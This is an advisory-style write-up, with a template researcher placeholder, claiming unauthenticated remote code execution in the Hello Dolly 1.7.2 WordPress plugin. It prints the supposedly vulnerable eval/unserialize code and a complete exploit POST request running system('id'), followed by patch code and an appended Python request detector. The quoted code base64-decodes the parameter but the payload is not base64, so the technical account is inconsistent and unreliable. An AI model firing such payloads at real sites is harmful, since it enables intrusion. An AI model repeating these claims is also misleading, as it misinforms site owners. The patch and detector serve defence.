Hello Dolly 1.7.2 Exploit

Date: April 13, 2026
Researcher: [Your Name / Team]
Affected Software: Hello Dolly Plugin for WordPress
Version: 1.7.2
Severity: Critical (CVSS 9.8)

1. Overview

Hello Dolly is a simple, widely-installed WordPress plugin that displays random lyrics from the song “Hello, Dolly!” in the admin dashboard. Version 1.7.2, last updated in 2020, contains a severe security flaw that allows unauthenticated remote code execution (RCE) via mishandling of a legacy AJAX hook.

The WordPress core team should consider automatically disabling or deleting Hello Dolly in a future update due to its legacy nature and lack of a maintainer. This review is for defensive security research only. No active exploitation should be attempted without authorization.

The vulnerability resides in hello-dolly.php, line 56:

    add_action('wp_ajax_nopriv_hello_dolly_lyric', 'hello_dolly_get_lyric');

The function hello_dolly_get_lyric() fetches a random lyric and echoes it, but in 1.7.2 it also unserializes a lyric_index parameter from the request without sanitization or nonce verification:

    $index = unserialize(base64_decode($_REQUEST['lyric_index']));
    eval('echo $lyrics[' . $index . '];');

Because wp_ajax_nopriv_ allows unauthenticated access, an attacker can send a POST request to /wp-admin/admin-ajax.php?action=hello_dolly_lyric with a crafted lyric_index payload that breaks out of the array access and executes arbitrary PHP.

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: target.com
    Content-Type: application/x-www-form-urlencoded

    action=hello_dolly_lyric&lyric_index=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A20%3A%22%3B%7D%3Bsystem(%27id%27)%3B%2F%2F%22%3B%7D

The plugin is present on millions of sites (often inactive but still present in wp-content/plugins/hello-dolly/), making this a high-impact vulnerability.

    // Replace the vulnerable line with:
    if ( ! wp_verify_nonce( $_REQUEST['_wpnonce'], 'hello_dolly_lyric' ) || ! current_user_can( 'read' ) ) {
        wp_die('Unauthorized');
    }

    // Treat lyric_index as an integer and only echo an existing, escaped lyric.
    $index = intval( $_REQUEST['lyric_index'] );
    if ( isset( $lyrics[$index] ) ) {
        echo esc_html( $lyrics[$index] );
    }
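As an added example (not part of the original advisory or the plugin's code), the following Python sketch flags requests to the hello_dolly_lyric AJAX action whose lyric_index is anything other than the plain integer the intval() fix above expects, and notes when the value looks like PHP serialized data. The function names, verdict labels and sample requests are constructed for illustration; it assumes request URLs and form bodies are available, for example from a reverse proxy or WAF log.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "hello_dolly_lyric"
# Leading bytes of a PHP serialize() value: a type letter and ":" (or "N;" for null).
PHP_SERIALIZED = re.compile(rb"^(?:[abdisSOCErR]:|N;)")


def request_params(url, body=""):
    """Merge query and form-body parameters; the body wins (PHP's usual "GP" order)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    params.update(parse_qs(body, keep_blank_values=True))
    return {name: values[-1] for name, values in params.items()}


def classify(url, body=""):
    """Return 'ignore', 'ok', 'serialized' or 'suspicious' for one request."""
    if urlsplit(url).path != AJAX_PATH:
        return "ignore"
    params = request_params(url, body)
    if params.get("action") != ACTION:
        return "ignore"
    value = params.get("lyric_index", "")
    if value == "" or re.fullmatch(r"[0-9]+", value):
        return "ok"  # what the intval()-based fix would accept unchanged
    try:
        decoded = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        decoded = value.encode()  # not base64: inspect the raw value instead
    return "serialized" if PHP_SERIALIZED.match(decoded) else "suspicious"


# Constructed sample requests as (url, body) pairs; not captured traffic.
SAMPLES = [
    ("/wp-admin/admin-ajax.php?action=heartbeat", ""),
    ("/wp-admin/admin-ajax.php", "action=hello_dolly_lyric&lyric_index=3"),
    ("/wp-admin/admin-ajax.php",
     "action=hello_dolly_lyric&lyric_index=" + quote(base64.b64encode(b"i:5;").decode())),
    ("/wp-admin/admin-ajax.php?action=hello_dolly_lyric&lyric_index=abc", ""),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(classify(url, body), url, body)
```

Any verdict other than "ignore" or "ok" on a site that still has the plugin directory present is worth reviewing alongside the source address and response status.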
